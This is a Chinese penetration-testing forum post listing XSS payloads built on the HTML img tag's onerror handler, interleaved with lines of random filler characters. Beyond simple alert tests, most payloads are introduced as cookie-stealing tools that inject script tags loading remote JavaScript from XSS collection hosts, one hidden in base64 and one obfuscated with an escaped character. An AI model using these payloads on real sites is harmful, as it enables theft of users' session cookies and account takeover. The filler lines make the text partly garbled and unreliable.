中国网络渗透测试联盟
标题:
img标签的常用几种测试手段
[打印本页]
作者:
admin
时间:
2015-10-18 14:33
标题:
img标签的常用几种测试手段
<img src='non-exist.jpg'onerror="alert('xss')">
- O- {6 j/ A3 x, K' S
<img src=# onerror=alert(123)>
+ G: ]( K" z: G. H0 C
<img src=# onerror=alert(document.cookie)>
6 _/ I1 v- a- D. f9 e. Y0 @
下面是利用平台钓cookie的
! g( h/ E# |# O, \! ~
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
. I0 O1 G9 @! D% ^: Z# \* e7 V1 x$ }
; k4 f; p4 i" x* ^; ~
, E6 K0 K* @3 e/ h& |9 J
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
3 K3 d" m( K# Z7 Q
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
8 E/ B" Y }( s; Z
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
1 c; `& `2 h2 w
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
. _( X* |: W7 c5 Y! S0 p
<img src="#">
* k+ V# m: {" B$ c
<img src="#">
) A; ]+ @8 F5 [1 n% i5 C6 s
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
. u, L1 F7 p- S: c+ y/ x$ K, u
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
4 ?; V' e5 Q! t- N
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
5 T; G& z/ {( z" Q& P
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
8 e/ }3 b6 u% w$ D
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
, h3 v9 s' P1 K1 W7 l3 R" I
<img src=x width="0" height="0"></img>
: T6 Y$ i& d0 w, O# T" ?
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
" `! p5 V: y/ M4 l$ x1 L0 |4 \
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
6 z+ G! o7 \( }
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2